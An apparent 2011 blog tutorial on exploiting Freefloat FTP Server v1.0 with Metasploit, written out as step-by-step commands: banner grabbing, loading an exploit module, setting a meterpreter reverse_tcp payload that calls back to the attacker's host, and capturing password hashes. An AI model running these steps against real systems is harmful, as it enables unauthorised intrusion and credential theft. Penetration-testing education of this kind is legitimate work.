Type : Tutorial
Level : Medium
Victim O.S : Windows XP SP 3
Victim Vulnerable Application : Freefloat FTP Server v1.0
Attacker O.S Backtrack 5 R1
Exploit Credit : Veerendra G.G SecPod Technologies (www.secpod.com)
Another vulnerable application that I found when surfing around from packet storm. In this tutorial also I will try to explain about the simple step by step how to perform an attack with a detailed way using metasploit framework.
1. Metasploit framework
2. freefloat_ftp_apee_cmd.rb exploit script (click here)
3. Freefloat FTP server v1.0 (download from mediafire.com)
Attacker IP : 192.168.8.93
Victim IP : 192.168.8.91
1. The first step we need to perform some scanning method to know are someone in our network used this vulnerability software or not. Let say I already know that there's a computer have port 21(FTP) opened with IP 192.168.8.91. Then I want to know what software he/she used by performing a simple banner grabbing.
ftp 192.168.8.91
There it is ๐ the vicitm use Freefloat FTP server.
2. Copy the freefloat_ftp_apee_cmd.rb to /pentest/exploits/framework/modules/exploits/remote/ folder.
cp freefloat_ftp_apee_cmd.rb /pentest/exploits/framework/modules/exploits/remote/
3. The next step let's prepare our metasploit console by running msfconsole command and then load the exploit.
msf > use exploit/remote/freefloat_ftp_apee_cmd
msf exploit(freefloat_ftp_apee_cmd) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
4. There's a few switch you need to set up when using this exploit(see picture below), but if you want to view the whole options, just run show options command.
Informations :
set rhost 192.168.8.91 --> set your target IP Address set lhost 192.168.8.93 --> attacker computer IP address set lport 443 --> port of your local computer used to handle the payload
5. Everything was set up so nice until this steps, the last step you need to run the exploit by using exploit command and see are it works or not.
PWNED!
We got the victim machine and also the password hash(click here to view how to crack the password hash). If you want to know more what meterpreter can do, you can view the tutorial here and here.
1. Until now when I write this tutorial (11-9-2011) there's still no cure, you can temporarily change to another FTP server application until the developer fix it up.
Hope it's useful ๐